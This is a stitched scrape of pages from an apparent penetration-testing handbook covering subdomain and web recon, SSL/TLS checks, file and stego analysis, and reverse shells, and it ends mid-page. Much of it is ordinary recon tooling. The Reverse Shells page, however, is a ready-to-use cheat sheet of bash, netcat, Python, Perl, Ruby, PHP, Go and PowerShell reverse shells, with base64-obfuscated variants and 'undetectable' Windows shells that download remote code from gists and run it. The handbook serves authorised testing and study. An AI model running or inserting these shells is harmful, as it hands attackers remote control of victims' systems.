![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MPECvtSLMogSm9TgcTr%252F-MPEFM5zwb_IazjhthKI%252Fimage.png%3Falt%3Dmedia%26token%3Dd4b19f25-55a8-4dba-a09f-e79a7b5cc2c2&width=768&dpr=3&quality=100&sign=70af79b7&sv=2) [PreviousNetwork Scanning](https://www.pentest-book.com/recon/network-scanning) [NextPacket Scanning](https://www.pentest-book.com/recon/packet-scanning) Last updated 4 years ago Was this helpful? * [nmap](https://www.pentest-book.com/recon/host-scanning#nmap) * [shodan](https://www.pentest-book.com/recon/host-scanning#shodan) Was this helpful? Copy # https://cli.shodan.io/ shodan host 151.101.1.68 --- # Webs recon | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/webs-recon.md) . [](https://www.pentest-book.com/recon/webs-recon#resolution) Resolution ---------------------------------------------------------------------------- Copy # https://github.com/projectdiscovery/httpx cat subdomains/subdomains.txt | httpx -follow-redirects -random-agent -status-code -silent -retries 2 -title -web-server -tech-detect -location -no-color -o websites.txt [](https://www.pentest-book.com/recon/webs-recon#waf-checks) WAF Checks ---------------------------------------------------------------------------- Copy # https://github.com/EnableSecurity/wafw00f wafw00f -i websites.txt # IP Wafs/CDN lists https://github.com/MISP/misp-warninglists [](https://www.pentest-book.com/recon/webs-recon#cms) CMS -------------------------------------------------------------- Copy # https://github.com/Tuhinshubhra/CMSeeK tr '\n' ',' < websites.txt > cms_test.txt python3 cmseek.py -l cms_test.txt --batch -r [](https://www.pentest-book.com/recon/webs-recon#web-screenshot) Web screenshot ------------------------------------------------------------------------------------ Copy # https://github.com/sensepost/gowitness gowitness file -f websites.txt gowitness report serve -D gowitness.sqlite3 [](https://www.pentest-book.com/recon/webs-recon#fuzzing) Fuzzing ---------------------------------------------------------------------- [](https://www.pentest-book.com/recon/webs-recon#urls) URLs ---------------------------------------------------------------- ### [](https://www.pentest-book.com/recon/webs-recon#url-extraction) URL extraction ### [](https://www.pentest-book.com/recon/webs-recon#filtering) Filtering Patterns ### [](https://www.pentest-book.com/recon/webs-recon#js) JS ### [](https://www.pentest-book.com/recon/webs-recon#wordlists-generation) Wordlists generation [PreviousSubdomain Takeover](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover) [NextNetwork Scanning](https://www.pentest-book.com/recon/network-scanning) Last updated 2 years ago Was this helpful? * [Resolution](https://www.pentest-book.com/recon/webs-recon#resolution) * [WAF Checks](https://www.pentest-book.com/recon/webs-recon#waf-checks) * [CMS](https://www.pentest-book.com/recon/webs-recon#cms) * [Web screenshot](https://www.pentest-book.com/recon/webs-recon#web-screenshot) * [Fuzzing](https://www.pentest-book.com/recon/webs-recon#fuzzing) * [URLs](https://www.pentest-book.com/recon/webs-recon#urls) * [URL extraction](https://www.pentest-book.com/recon/webs-recon#url-extraction) * [Filtering](https://www.pentest-book.com/recon/webs-recon#filtering) * [JS](https://www.pentest-book.com/recon/webs-recon#js) * [Wordlists generation](https://www.pentest-book.com/recon/webs-recon#wordlists-generation) Was this helpful? Copy # https://github.com/ffuf/ffuf ffuf -mc all -fc 404 -ac -sf -s -w wordlist.txt -u https://www.domain.com/FUZZ Copy # https://github.com/jaeles-project/gospider gospider -S websites.txt --js -t 20 -d 2 --sitemap --robots -w -r > urls.txt # https://github.com/lc/gau cat websites.txt | gau --subs # https://github.com/tomnomnom/waybackurls cat websites.txt | waybackurls # https://github.com/gwen001/github-endpoints github-endpoints -q -k -d united.com -t tokens_github.txt # https://github.com/Josue87/roboxtractor cat webs.txt | roboxtractor -m 1 -wb # https://github.com/projectdiscovery/katana katana -u target.com -ps -silent -pss waybackarchive,commoncrawl,alienvault -o urls.txt ##Passive mode katana -u target.com -duc -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff -o urls.txt ##Crawling and Spidering # https://github.com/xnl-h4ck3r/waymore waymore -i target.com -mode U -oU urls.txt Copy # https://github.com/tomnomnom/qsreplace cat urls.txt | qsreplace -a # https://github.com/s0md3v/uro cat urls.txt | uro Copy # https://github.com/tomnomnom/gf # https://github.com/1ndianl33t/Gf-Patterns gf sqli urls.txt Copy # https://github.com/w9w/JSA cat urls.txt | python3 jsa.py # https://github.com/lc/subjs cat js.txt | subjs | httpx # https://github.com/GerbenJavado/LinkFinder python3 linkfinder.py -d -i https://domain.com/whatever.js -o cli Copy # https://github.com/tomnomnom/unfurl cat urls.txt | unfurl -u keys cat urls.txt | unfurl -u values --- # Subdomain Enum | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/subdomain-enum.md) . > **Skill Level**: Beginner **Prerequisites**: Basic DNS understanding [](https://www.pentest-book.com/recon/subdomain-enum#passive-sources) Passive sources ------------------------------------------------------------------------------------------ Copy # https://github.com/OWASP/Amass # https://github.com/OWASP/Amass/blob/master/examples/config.ini amass enum -passive -d domain.com # https://github.com/projectdiscovery/subfinder # https://github.com/projectdiscovery/subfinder#post-installation-instructions subfinder -d domain.com -all -silent # https://github.com/tomnomnom/assetfinder assetfinder example.com # https://github.com/tomnomnom/waybackurls # https://github.com/tomnomnom/unfurl echo domain.com | waybackurls | unfurl -u domains # https://github.com/lc/gau # https://github.com/tomnomnom/unfurl gau --subs example.com | unfurl -u domains ## Cert Transparency # https://certificate.transparency.dev/ # https://crt.sh/ # https://github.com/glebarez/cero cero example.com # https://github.com/UnaPibaGeek/ctfr python3 ctfr.py -d domain.com # Active crtsh monitoring #https://github.com/g0ldencybersec/gungnir gungnir -r domains.txt # https://github.com/gwen001/github-subdomains github-subdomains -d example.com -t tokens.txt -o output.txt # https://github.com/christophetd/censys-subdomain-finder python3 censys-subdomain-finder.py example.com # https://github.com/SmoZy92/Shodomain python shodomain.py example.com # https://github.com/Cgboal/SonarSearch crobat -s example.com [](https://www.pentest-book.com/recon/subdomain-enum#active-dns-resolution) Active DNS resolution ------------------------------------------------------------------------------------------------------ [](https://www.pentest-book.com/recon/subdomain-enum#alterations-and-permutations) Alterations and permutations -------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/subdomain-enum#crawling) Crawling ---------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/subdomain-enum#dns-records) DNS records ---------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/subdomain-enum#dns-wordlists) DNS wordlists -------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/subdomain-enum#other-techniques) Other techniques -------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/recon/subdomain-enum#google-analytics-id) Google Analytics ID ### [](https://www.pentest-book.com/recon/subdomain-enum#subdomain-discovery-with-burp) Subdomain discovery with Burp Navigate through target main website with Burp: * Without passive scanner * Set forms auto submit * Scope in advanced, any protocol and one keyword ("tesla") * Last step, select all sitemap, Engagement Tools -> Analyze target [PreviousRoot domains](https://www.pentest-book.com/recon/domain-enum) [NextSubdomain Takeover](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover) Last updated 5 months ago Was this helpful? * [Passive sources](https://www.pentest-book.com/recon/subdomain-enum#passive-sources) * [Active DNS resolution](https://www.pentest-book.com/recon/subdomain-enum#active-dns-resolution) * [Alterations and permutations](https://www.pentest-book.com/recon/subdomain-enum#alterations-and-permutations) * [Crawling](https://www.pentest-book.com/recon/subdomain-enum#crawling) * [DNS records](https://www.pentest-book.com/recon/subdomain-enum#dns-records) * [DNS wordlists](https://www.pentest-book.com/recon/subdomain-enum#dns-wordlists) * [Other techniques](https://www.pentest-book.com/recon/subdomain-enum#other-techniques) * [Google Analytics ID](https://www.pentest-book.com/recon/subdomain-enum#google-analytics-id) * [Subdomain discovery with Burp](https://www.pentest-book.com/recon/subdomain-enum#subdomain-discovery-with-burp) Was this helpful? Copy # Generate custom resolvers list, always # https://github.com/vortexau/dnsvalidator dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 200 # https://github.com/d3mondev/puredns puredns resolve subdomains.txt -r ~/Tools/resolvers.txt ## BF # https://github.com/d3mondev/puredns puredns bruteforce ~/Tools/subdomains.txt united.com -r ~/Tools/resolvers.txt # https://github.com/projectdiscovery/shuffledns shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt Copy #https://github.com/Josue87/gotator gotator -sub subdomains/subdomains.txt -perm permutations_list.txt -depth 1 -numbers 10 -mindup -adv -md Copy # 1st resolve subdomains on valid websites # https://github.com/projectdiscovery/httpx cat subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -silent -retries 2 -title -web-server -tech-detect -location -o webs_info.txt # Clean output cat webs_info.txt | cut -d ' ' -f1 | grep ".domain.com" | sort -u > websites.txt # Crawl them # https://github.com/jaeles-project/gospider gospider -S websites.txt --js -t 20 -d 2 --sitemap --robots -w -r > urls.txt # Clean output # https://github.com/tomnomnom/unfurl cat urls.txt | sed '/^.\{2048\}./d' | grep -Eo 'https?://[^ ]+' | sed 's/]$//' | unfurl -u domains | grep ".domain.com" Copy # https://github.com/projectdiscovery/dnsx dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -silent -l subdomains.txt Copy # https://gist.githubusercontent.com/six2dez/a307a04a222fab5a57466c51e1569acf/raw # https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt # https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a Copy # https://github.com/Josue87/AnalyticsRelationships cat subdomains.txt | analyticsrelationships --- # SSL/TLS | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/ssl-tls.md) . [](https://www.pentest-book.com/enumeration/ssl-tls#modern-testing-tools) Modern Testing Tools --------------------------------------------------------------------------------------------------- Copy # Comprehensive TLS testing (recommended) # testssl.sh - https://github.com/drwetter/testssl.sh testssl.sh https://example.com # With specific checks testssl.sh --vulnerable https://example.com testssl.sh --cipher-per-proto https://example.com # SSLyze - Python-based # https://github.com/nabla-c0d3/sslyze sslyze --regular example.com:443 # tlsx - Fast TLS prober # https://github.com/projectdiscovery/tlsx tlsx -u example.com -port 443 # Nmap SSL scripts nmap --script ssl-* -p 443 example.com [](https://www.pentest-book.com/enumeration/ssl-tls#id-2025-best-practices) 2025 Best Practices ---------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/ssl-tls#recommended-configuration) Recommended Configuration [](https://www.pentest-book.com/enumeration/ssl-tls#quick-vulnerability-checks) Quick Vulnerability Checks --------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#drown) DROWN --------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#tls_fallback_scsv) TLS\_FALLBACK\_SCSV ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#beast) BEAST --------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#lucky13) LUCKY13 ------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#sweet32) Sweet32 ------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#logjam) Logjam ----------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#sslv2-support) SSLv2 Support ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#sslv3-support) SSLv3 Support ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#cipher-suites) Cipher suites ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#secure-renegotiation) Secure renegotiation --------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#crime) CRIME --------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#breach) BREACH ----------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#heartbleed) Heartbleed ------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#change-cipher-spec-injection) Change cipher spec injection ------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#cipher-order-enforcement) Cipher order enforcement ----------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ssl-tls#additional-vulnerabilities) Additional Vulnerabilities --------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/ssl-tls#poodle) POODLE ### [](https://www.pentest-book.com/enumeration/ssl-tls#robot) ROBOT ### [](https://www.pentest-book.com/enumeration/ssl-tls#certificate-issues) Certificate Issues [](https://www.pentest-book.com/enumeration/ssl-tls#resources) Resources ----------------------------------------------------------------------------- * [SSL Labs Server Test](https://www.ssllabs.com/ssltest/) * [testssl.sh](https://github.com/drwetter/testssl.sh) * [Mozilla SSL Configuration Generator](https://ssl-config.mozilla.org/) * [OWASP TLS Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html) [PreviousFiles](https://www.pentest-book.com/enumeration/files) [NextPorts](https://www.pentest-book.com/enumeration/ports) Last updated 5 months ago Was this helpful? * [Modern Testing Tools](https://www.pentest-book.com/enumeration/ssl-tls#modern-testing-tools) * [2025 Best Practices](https://www.pentest-book.com/enumeration/ssl-tls#id-2025-best-practices) * [Recommended Configuration](https://www.pentest-book.com/enumeration/ssl-tls#recommended-configuration) * [Quick Vulnerability Checks](https://www.pentest-book.com/enumeration/ssl-tls#quick-vulnerability-checks) * [DROWN](https://www.pentest-book.com/enumeration/ssl-tls#drown) * [TLS\_FALLBACK\_SCSV](https://www.pentest-book.com/enumeration/ssl-tls#tls_fallback_scsv) * [BEAST](https://www.pentest-book.com/enumeration/ssl-tls#beast) * [LUCKY13](https://www.pentest-book.com/enumeration/ssl-tls#lucky13) * [Sweet32](https://www.pentest-book.com/enumeration/ssl-tls#sweet32) * [Logjam](https://www.pentest-book.com/enumeration/ssl-tls#logjam) * [SSLv2 Support](https://www.pentest-book.com/enumeration/ssl-tls#sslv2-support) * [SSLv3 Support](https://www.pentest-book.com/enumeration/ssl-tls#sslv3-support) * [Cipher suites](https://www.pentest-book.com/enumeration/ssl-tls#cipher-suites) * [Secure renegotiation](https://www.pentest-book.com/enumeration/ssl-tls#secure-renegotiation) * [CRIME](https://www.pentest-book.com/enumeration/ssl-tls#crime) * [BREACH](https://www.pentest-book.com/enumeration/ssl-tls#breach) * [Heartbleed](https://www.pentest-book.com/enumeration/ssl-tls#heartbleed) * [Change cipher spec injection](https://www.pentest-book.com/enumeration/ssl-tls#change-cipher-spec-injection) * [Cipher order enforcement](https://www.pentest-book.com/enumeration/ssl-tls#cipher-order-enforcement) * [Additional Vulnerabilities](https://www.pentest-book.com/enumeration/ssl-tls#additional-vulnerabilities) * [POODLE](https://www.pentest-book.com/enumeration/ssl-tls#poodle) * [ROBOT](https://www.pentest-book.com/enumeration/ssl-tls#robot) * [Certificate Issues](https://www.pentest-book.com/enumeration/ssl-tls#certificate-issues) * [Resources](https://www.pentest-book.com/enumeration/ssl-tls#resources) Was this helpful? Copy # Protocols āœ… TLS 1.3 (preferred) āœ… TLS 1.2 (acceptable) āŒ TLS 1.1 (deprecated) āŒ TLS 1.0 (deprecated) āŒ SSLv3 (insecure) āŒ SSLv2 (insecure) # Cipher Suites (TLS 1.3) TLS_AES_256_GCM_SHA384 TLS_CHACHA20_POLY1305_SHA256 TLS_AES_128_GCM_SHA256 # Cipher Suites (TLS 1.2) ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-GCM-SHA384 ECDHE-ECDSA-CHACHA20-POLY1305 ECDHE-RSA-CHACHA20-POLY1305 ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-GCM-SHA256 # Key Exchange āœ… ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) āš ļø DHE (only with 2048+ bit parameters) āŒ RSA key exchange (no forward secrecy) āŒ DH < 2048 bits # Certificates āœ… RSA 2048+ bits or ECDSA 256+ bits āœ… SHA-256 or better signature āŒ SHA-1 signatures āŒ MD5 signatures Copy # Check supported protocols openssl s_client -connect example.com:443 -tls1_3 openssl s_client -connect example.com:443 -tls1_2 openssl s_client -connect example.com:443 -tls1_1 openssl s_client -connect example.com:443 -tls1 # Check certificate details openssl s_client -connect example.com:443 /dev/null | openssl x509 -noout -text # Check certificate expiry echo | openssl s_client -connect example.com:443 2>/dev/null | openssl x509 -noout -dates # Check certificate chain openssl s_client -connect example.com:443 -showcerts Copy # Check for "SSLv2 supported" nmap -p- -sV -sC example.com testssl.sh --drown example.com Copy # Check in the lower port openssl s_client –tls1 -fallback_scsv -connect example.com:443 # - Response: # tlsv1 alert inappropriate fallback:s3_pkt.c:1262:SSL alert number 86 Copy # TLSv1.0 and CBC ciphers openssl s_client -[sslv3/tls1] -cipher CBC_CIPHER -connect example.com:443 Copy openssl s_client -cipher CBC_CIPHER -connect example.com:443 Copy openssl s_client -cipher 3DES -connect example.com:443 Copy # Check the "Server Temp Key" response is bigger than 1024 (only in OpenSSL 1.0.2 or better) openssl s_client -connect www.example.com:443 -cipher "EDH" Copy # If is supported this will return the server certificate information if not, error openssl s_client –ssl2 -connect example.com:443 Copy # If is supported this will return the server certificate information if not, error openssl s_client -ssl3 -connect google.com:443 Copy # Cipher Suites nmap --script ssl-enum-ciphers -p 443 example.com # - Anon cypher (fail) openssl s_client -cipher aNULL -connect example.com:443 # - DES Cipher (fail) openssl s_client -cipher DES -connect example.com:443 # - 3DES Cipher (fail) openssl s_client -cipher 3DES -connect example.com:443 # - Export Cipher (fail) openssl s_client -cipher EXPORT -connect example.com:443 # - Low Cipher (fail) openssl s_client -cipher LOW -connect example.com:443 # - RC4 Cipher (fail) openssl s_client -cipher RC4 -connect example.com:443 # - NULL Cipher (fail) openssl s_client -cipher NULL -connect example.com:443 # - Perfect Forward Secrecy Cipher (This should NOT fail): openssl s_client -cipher EECDH, EDH NULL -connect example.com:443 Copy # Check secure renegotiation is not supported # If not, send request in the renegotiation # Once sent, if it's vulnerable it shouldn't return error openssl s_client -connect example.com:443 HEAD / HTTP/1.0 R # Copy # Check for "Compression: NONE" openssl s_client -connect example.com:443 Copy # If the response contains encoded data, host is vulnerable openssl s_client -connect example.com:443 GET / HTTP/1.1 Host: example.com Accept-Encoding: compress, gzip Copy # Heartbleed nmap -p 443 --script ssl-heartbleed --script-args vulns.showall example.com # Heartbleed checker oneliner from sites list cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done Copy nmap -p 443 --script ssl-ccs-injection example.com Copy # Choose a protocol and 2 different ciphers, one stronger than other # Make 2 request with different cipher order anc check in the response if the cipher is the first of the request in both cases nmap -p 443 --script ssl-enum-ciphers example.com openssl s_client –tls1_2 –cipher ā€˜AES128-GCM-SHA256:AES128-SHA’ –connect contextis.co.uk:443 openssl s_client –tls1_2 –cipher ā€˜AES128-SHA:AES128-GCM-SHA256’ –connect contextis.co.uk:443 Copy # SSLv3 + CBC = vulnerable openssl s_client -ssl3 -connect example.com:443 testssl.sh --poodle example.com Copy # Return Of Bleichenbacher's Oracle Threat # RSA key exchange vulnerability testssl.sh --robot example.com Copy # Check for certificate issues testssl.sh --cert example.com # Common issues: # - Expired certificate # - Self-signed certificate # - Wrong hostname (CN/SAN mismatch) # - Weak signature algorithm (SHA-1, MD5) # - Short key length (< 2048 bits RSA) # - Missing intermediate certificates --- # Files | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/files.md) . ### [](https://www.pentest-book.com/enumeration/files#common) Common Copy # Check real file type file file.xxx # Analyze strings strings file.xxx strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars # Check embedded files binwalk file.xxx # Check binwalk -e file.xxx # Extract # Check as binary file in hex ghex file.xxx # Check metadata exiftool file.xxx # Stego tool for multiple formats wget https://embeddedsw.net/zip/OpenPuff_release.zip unzip OpenPuff_release.zip -d ./OpenPuff wine OpenPuff/OpenPuff_release/OpenPuff.exe # Compressed files fcrackzip file.zip # https://github.com/priyankvadaliya/Zip-Cracker- python zipcracker.py -f testfile.zip -d passwords.txt python zipcracker.py -f testfile.zip -d passwords.txt -o extractdir # Office documents https://github.com/assafmo/xioc # Zip files in website pip install remotezip # list contents of a remote zip file remotezip -l "http://site/bigfile.zip" # extract file.txt from a remote zip file remotezip "http://site/bigfile.zip" "file.txt" # Grep inside any files # https://github.com/phiresky/ripgrep-all rga "whatever" folder/ ### [](https://www.pentest-book.com/enumeration/files#disk-files) Disk files ### [](https://www.pentest-book.com/enumeration/files#audio) Audio ### [](https://www.pentest-book.com/enumeration/files#images) Images [PreviousPacket Scanning](https://www.pentest-book.com/recon/packet-scanning) [NextSSL/TLS](https://www.pentest-book.com/enumeration/ssl-tls) Last updated 5 years ago Was this helpful? * [Common](https://www.pentest-book.com/enumeration/files#common) * [Disk files](https://www.pentest-book.com/enumeration/files#disk-files) * [Audio](https://www.pentest-book.com/enumeration/files#audio) * [Images](https://www.pentest-book.com/enumeration/files#images) Was this helpful? Copy # guestmount can mount any kind of disk file sudo apt-get install libguestfs-tools guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory Copy # Check spectrogram wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb dpkg -i sonic-visualiser_4.0_amd64.deb # Check for Stego hideme stego.mp3 -f && cat output.txt #AudioStego Copy # Stego wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar chmod +x stegsolve.jar java -jar stegsolve.jar # Stegpy stegpy -p file.png # Check png corrupted pngcheck -v image.jpeg # Check what kind of image is identify -verbose image.jpeg # Stegseek # https://github.com/RickdeJager/stegseek stegseek --seed file.jpg stegseek file.jpg rockyou.txt --- # Reverse Shells | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/reverse-shells.md) . > **Skill Level**: Beginner to Intermediate **Prerequisites**: Basic shell usage, networking [](https://www.pentest-book.com/exploitation/reverse-shells#tools) Tools ----------------------------------------------------------------------------- Copy **Tools** https://github.com/ShutdownRepo/shellerator https://github.com/0x00-0x00/ShellPop https://github.com/cybervaca/ShellReverse https://liftoff.github.io/pyminifier/ https://github.com/xct/xc/ https://weibell.github.io/reverse-shell-generator/ https://github.com/phra/PEzor [](https://www.pentest-book.com/exploitation/reverse-shells#linux) Linux ----------------------------------------------------------------------------- Copy # Bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f nc -e /bin/sh 10.11.1.111 4443 bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1 # Bash B64 Ofuscated {echo,COMMAND_BASE64}|{base64,-d}|bashĀ  echo${IFS}COMMAND_BASE64|base64${IFS}-d|bash bash -c {echo,COMMAND_BASE64}|{base64,-d}|{bash,-i} echo COMMAND_BASE64 | base64 -d | bash # Perl perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' # Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c '__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\' # Python IPv6 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' # Ruby ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' # PHP: # /usr/share/webshells/php/php-reverse-shell.php # http://pentestmonkey.net/tools/web-shells/php-reverse-shell php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");' $sock, 1=>$sock, 2=>$sock), $pipes);?> # Golang echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go # AWK awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell # Socat socat TCP4:10.10.10.10:443 EXEC:/bin/bash # Socat listener socat -d -d TCP4-LISTEN:443 STDOUT [](https://www.pentest-book.com/exploitation/reverse-shells#windows) Windows --------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/reverse-shells#tips) Tips --------------------------------------------------------------------------- [PreviousPayloads](https://www.pentest-book.com/exploitation/payloads) [NextFile transfer](https://www.pentest-book.com/exploitation/file-transfer) Last updated 5 months ago Was this helpful? * [Tools](https://www.pentest-book.com/exploitation/reverse-shells#tools) * [Linux](https://www.pentest-book.com/exploitation/reverse-shells#linux) * [Windows](https://www.pentest-book.com/exploitation/reverse-shells#windows) * [Tips](https://www.pentest-book.com/exploitation/reverse-shells#tips) Was this helpful? Copy # Netcat nc -e cmd.exe 10.11.1.111 4443 # Powershell $callback = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close() powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # Undetectable: # https://0xdarkvortex.dev/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/ i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc # Undetectable 2: # https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 # 64bit: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell # 32bit: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell Copy # rlwrap # https://linux.die.net/man/1/rlwrap # Connect to a netcat client: rlwrap nc [IP Address] [port] # Connect to a netcat Listener: rlwrap nc -lvp [Localport] # Linux Backdoor Shells: rlwrap nc [Your IP Address] -e /bin/sh rlwrap nc [Your IP Address] -e /bin/bash rlwrap nc [Your IP Address] -e /bin/zsh rlwrap nc [Your IP Address] -e /bin/ash # Windows Backdoor Shell: rlwrap nc -lv [localport] -e cmd.exe --- # Payloads | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as 